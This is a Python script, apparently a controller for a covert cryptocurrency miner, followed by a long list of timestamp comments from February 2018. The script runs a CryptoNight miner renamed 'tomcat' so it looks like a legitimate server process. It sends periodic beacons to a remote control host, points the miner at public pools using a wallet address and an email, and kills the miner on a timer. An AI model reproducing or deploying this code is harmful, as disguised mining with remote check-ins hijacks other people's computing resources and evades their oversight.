import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:01.697242
#2018-02-17 16:23:04.789951
#2018-02-17 18:11:06.848587
#2018-02-17 19:59:04.796285
#2018-02-17 21:47:03.923989
#2018-02-17 23:32:01.514641
#2018-02-18 01:20:07.280801
#2018-02-18 03:07:06.535466
#2018-02-18 04:56:04.288218
#2018-02-18 06:49:05.132996
#2018-02-18 08:37:01.375464
#2018-02-18 10:23:05.737041
#2018-02-18 12:09:01.536748
#2018-02-18 13:53:06.815314
#2018-02-18 15:45:06.934079
#2018-02-18 17:36:04.238101
#2018-02-18 19:24:06.475832
#2018-02-18 21:09:04.740686
#2018-02-18 22:56:05.776102
#2018-02-19 00:45:05.215885
#2018-02-19 02:32:01.577450
#2018-02-19 04:18:03.469812
#2018-02-19 06:03:06.271042
#2018-02-19 07:51:03.881891
#2018-02-19 09:41:06.374019
#2018-02-19 11:31:08.463105
#2018-02-19 13:18:01.455190
#2018-02-19 15:06:01.297520
#2018-02-19 16:53:09.267696
#2018-02-19 18:40:05.968862
#2018-02-19 20:26:07.059076
#2018-02-19 22:14:05.438746
#2018-02-20 00:00:10.752201
#2018-02-20 01:47:05.819147
#2018-02-20 03:34:08.700062
#2018-02-20 05:21:07.805745
#2018-02-20 07:06:08.089049
#2018-02-20 08:52:05.823017
#2018-02-20 10:36:04.774665
#2018-02-20 12:21:06.596661
#2018-02-20 14:08:03.819069
#2018-02-20 15:50:14.953928
#2018-02-20 17:37:01.311898
#2018-02-20 19:24:07.225877
#2018-02-20 21:12:04.468292
#2018-02-20 22:56:01.712340
#2018-02-21 00:42:01.230470
#2018-02-21 02:27:02.593435
#2018-02-21 04:13:01.232897
#2018-02-21 05:59:06.059047
#2018-02-21 07:48:01.593595
#2018-02-21 09:28:06.582243
#2018-02-21 11:16:09.743387
#2018-02-21 13:06:09.749123
#2018-02-21 14:53:09.630913
#2018-02-21 16:42:06.223370
#2018-02-21 18:31:02.106233
#2018-02-21 20:17:07.808691
#2018-02-21 22:06:05.776262
#2018-02-21 23:52:05.897282
#2018-02-22 01:41:02.279783
#2018-02-22 03:28:07.671436
#2018-02-22 05:15:08.284599
#2018-02-22 06:59:04.333350
#2018-02-22 08:46:06.124194
#2018-02-22 10:34:04.421619
#2018-02-22 12:21:09.790711
#2018-02-22 14:06:05.697168
#2018-02-22 15:51:08.267540
#2018-02-22 17:39:01.630488
#2018-02-22 19:26:05.890687
#2018-02-22 21:17:09.065189
#2018-02-22 23:02:06.676733
#2018-02-23 00:50:08.568307
#2018-02-23 02:39:01.304975
#2018-02-23 04:28:04.117615
#2018-02-23 06:13:07.560753
#2018-02-23 07:59:07.049961
#2018-02-23 10:14:08.980256
#2018-02-23 12:06:07.553915
#2018-02-23 13:54:01.722039
#2018-02-23 15:45:09.963135
#2018-02-23 17:31:07.301489
#2018-02-23 19:20:05.462857
#2018-02-23 21:05:03.899787
#2018-02-23 22:50:10.072174
#2018-02-24 00:38:05.247046
#2018-02-24 02:28:06.541743
#2018-02-24 04:19:06.782573
#2018-02-24 06:07:07.691217
#2018-02-24 07:55:05.401193
#2018-02-24 09:39:07.631418
#2018-02-24 11:34:07.824572
#2018-02-24 13:25:04.205671
#2018-02-24 15:14:02.225937
#2018-02-24 17:02:07.641224
#2018-02-24 18:51:05.308315
#2018-02-24 20:40:09.163936
#2018-02-24 22:48:06.389437
#2018-02-25 02:09:03.528983
#2018-02-25 05:48:07.561338
#2018-02-25 11:37:04.050106